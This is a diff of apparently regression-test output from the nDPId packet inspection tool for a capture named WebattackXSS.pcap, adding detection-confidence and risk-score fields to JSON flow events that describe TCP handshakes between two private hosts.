 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2556,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":1,"flow_last_seen":1499347273742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347273742,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8s+tAAD4GEeWsEAABwKgKMtiUAFBek6EkAAAAAKACchByXgAAAgQFtAQCCAoBOhLPAAAAAAEDAwc="}
@@ -958,16 +958,16 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2625,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":1499347282573,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347282573,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8mj1AAD4GK5OsEAABwKgKMtjyAFDR4YFTAAAAAKACchAV5AAAAgQFtAQCCAoBOhtuAAAAAAEDAwc="}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":2,"flow_last_seen":1499347282574,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347282574,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2PL\/kZOB0eGBVKAScSCS5gAAAgQFtAQCCAoD4+zlATobbgEDAwc="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2627,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":3,"flow_last_seen":1499347282574,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347282574,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0mj5AAD4GK5qsEAABwKgKMtjyAFDR4YFU\/5GTgoAQAOUx7QAAAQEICgE6G28D4+zl"}
-00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":312,"flow_first_seen":1499347097460,"flow_last_seen":1499347166757,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232375,"flow_avg_l4_payload_len":744,"midstream":0,"ts_msec":1499347283585,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53584,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347155346,"flow_last_seen":1499347160658,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347283585,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54188,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":312,"flow_first_seen":1499347097460,"flow_last_seen":1499347166757,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232375,"flow_avg_l4_payload_len":744,"midstream":0,"ts_msec":1499347283585,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53584,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347155346,"flow_last_seen":1499347160658,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347283585,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54188,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347155346,"flow_last_seen":1499347160658,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347283585,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54188,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347156630,"flow_last_seen":1499347161658,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347283585,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54202,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347156630,"flow_last_seen":1499347161658,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347283585,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54202,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347156630,"flow_last_seen":1499347161658,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347283585,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347159323,"flow_last_seen":1499347164659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347283585,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54228,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347159323,"flow_last_seen":1499347164659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347283585,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54228,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347159323,"flow_last_seen":1499347164659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347283585,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54228,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347160581,"flow_last_seen":1499347165659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347283585,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54242,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347160581,"flow_last_seen":1499347165659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347283585,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54242,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347160581,"flow_last_seen":1499347165659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347283585,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54242,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347164459,"flow_last_seen":1499347169660,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347283585,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54282,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347164459,"flow_last_seen":1499347169660,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347283585,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54282,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347164459,"flow_last_seen":1499347169660,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347283585,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54282,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2644,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347285114,"flow_last_seen":1499347285114,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347285114,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55564,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2644,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":1499347285114,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347285114,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8AAxAAD4GxcSsEAABwKgKMtkMAFDF1B3mAAAAAKACchCCyAAAAgQFtAQCCAoBOh3qAAAAAAEDAwc="}
@@ -993,21 +993,21 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2712,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1499347292725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347292725,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Az5AAD4GwpKsEAABwKgKMtleAFDMWSZmAAAAAKACchBsAwAAAgQFtAQCCAoBOiVYAAAAAAEDAwc="}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2713,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":2,"flow_last_seen":1499347292725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347292725,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2V6LTEh8zFkmZ6AScSCeZwAAAgQFtAQCCAoD4\/bOATolWAEDAwc="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":3,"flow_last_seen":1499347292726,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347292726,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Az9AAD4GwpmsEAABwKgKMtleAFDMWSZni0xIfYAQAOU9bgAAAQEICgE6JVkD4\/bO"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347165741,"flow_last_seen":1499347171660,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347293736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54296,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347165741,"flow_last_seen":1499347171660,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347293736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54296,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347165741,"flow_last_seen":1499347171660,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347293736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54296,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347168302,"flow_last_seen":1499347173661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347293736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54322,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347168302,"flow_last_seen":1499347173661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347293736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54322,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347168302,"flow_last_seen":1499347173661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347293736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54322,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347169573,"flow_last_seen":1499347174661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347293736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54336,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347169573,"flow_last_seen":1499347174661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347293736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54336,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347169573,"flow_last_seen":1499347174661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347293736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54336,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347172098,"flow_last_seen":1499347177661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347293736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54362,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347172098,"flow_last_seen":1499347177661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347293736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54362,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347172098,"flow_last_seen":1499347177661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347293736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54362,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347173373,"flow_last_seen":1499347178662,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347293736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54376,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347173373,"flow_last_seen":1499347178662,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347293736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54376,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347173373,"flow_last_seen":1499347178662,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347293736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54376,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2730,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347295224,"flow_last_seen":1499347295224,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347295224,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55672,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2730,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1499347295224,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347295224,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CihAAD4Gu6isEAABwKgKMtl4AFDbgS3hAAAAAKACchBS1QAAAgQFtAQCCAoBOifJAAAAAAEDAwc="}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2731,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":2,"flow_last_seen":1499347295224,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347295224,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2XjDo5gx24Et4qAScSD6uwAAAgQFtAQCCAoD4\/k\/ATonyQEDAwc="}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":3,"flow_last_seen":1499347295224,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347295224,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CilAAD4Gu6+sEAABwKgKMtl4AFDbgS3iw6OYMoAQAOWZwwAAAQEICgE6J8kD4\/k\/"}
